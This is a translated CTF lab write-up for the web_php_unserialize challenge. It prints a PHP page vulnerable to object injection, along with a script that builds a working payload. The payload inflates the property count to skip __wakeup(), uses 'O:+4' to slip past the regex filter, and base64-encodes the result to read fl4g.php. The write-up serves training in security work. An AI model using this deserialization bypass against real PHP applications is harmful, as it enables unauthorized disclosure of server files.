当前位置：网站首页>Attack and defense world web master advanced area web_ php_ unserialize

Attack and defense world web master advanced area web_ php_ unserialize

2022-07-29 00:17:00 【Ant200】

Tips ： Please correct your mistakes

List of articles

Tools
analysis
operation

Tools

1. firefox

2.phpstudy

analysis

This topic mainly examines the knowledge points ：

1.__construct()： When an object is created （new） Will automatically call . Will the incoming $file Assign values to local private methods $file
2.unserialize() Time will not be called automatically .（ Constructors ）
3.__destruct()： Automatically called when the object is destroyed .（ Destructor ）
4.__wakeup()：unserialize() Will automatically call
5. Deserialization and serialization
6.base64 encryption

First, code audit , Find out flag stay fl4g.php in , We have to find a way to enter fl4g.php

operation

The code is as follows ：

<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } if (isset($_GET['var'])) { $var = base64_decode($_GET['var']); if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else { @unserialize($var); } } else { highlight_file("index.php"); } ?>

Several functions have been mentioned above , First, it defines a Demo class ,, also //the secret is in the fl4g.php This string of code finds flag stay fl4g.php in , We have to find a way to enter fl4g.php

Parameters in code var First of all to base64 decode -- Regular expression filtering -- Deserialization

So structure payload You should serialize first -- Regular expression filtering bypasses --base64 code

Construct serialization payload, Put it in phpstudy Run locally under

Code

<?php

class demo
{
    private $file = 'index.php';
    public function __construct($file)
    {
        $this->file = $file;
    }
    function __destruct()
    {
        echo @highlight_file($this->file, true);
    }
    function __wakeup()
    {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$file = 'fl4g.php';
$d = new demo($file);
$s = serialize($d);
print_r($s);
?>

Get the serialized value ：O:4:"demo":1:{s:10:"demofile";s:8:"fl4g.php";} Since the serialized value will be deserialized automatically, it is necessary to bypass __wakeup(),wakeup() Function has a vulnerability , When the number of member variables is greater than the number of actual member variables of this class , Will skip wakeup() Implementation , So the modified serialized value is

O:4:"demo":2:{s:10:"demofile";s:8:"fl4g.php";}, Then regular expression filtering , Bypass to perform deserialization

preg_match() The match is o or c : Any length number （ At least one ） /i It means that matching is not case sensitive. Here we use php Characteristics of +4 Actually equal to 4, So constructed payload by O:+4:"demo":2:{s:10:"demofile";s:8:"fl4g.php";}, The last part base64 encryption , Code ：

<?php

class demo
{
    private $file = 'index.php';
    public function __construct($file)
    {
        $this->file = $file;
    }
    function __destruct()
    {
        echo @highlight_file($this->file, true);
    }
    function __wakeup()
    {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}

$file = 'fl4g.php';
$d = new demo($file);
$s = serialize($d);
//O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
$s = str_replace(':1:', ':2:', $s);// Replace 1 by 2
$s = str_replace('O:4', 'O:+4', $s);// Replace 4 by +4
print_r($s);// Output s
print_r("<br>");// Means line break 
print_r(base64_encode($s))
?>

str_replace It means that you will 1 Replace with 2,4 Replace with +4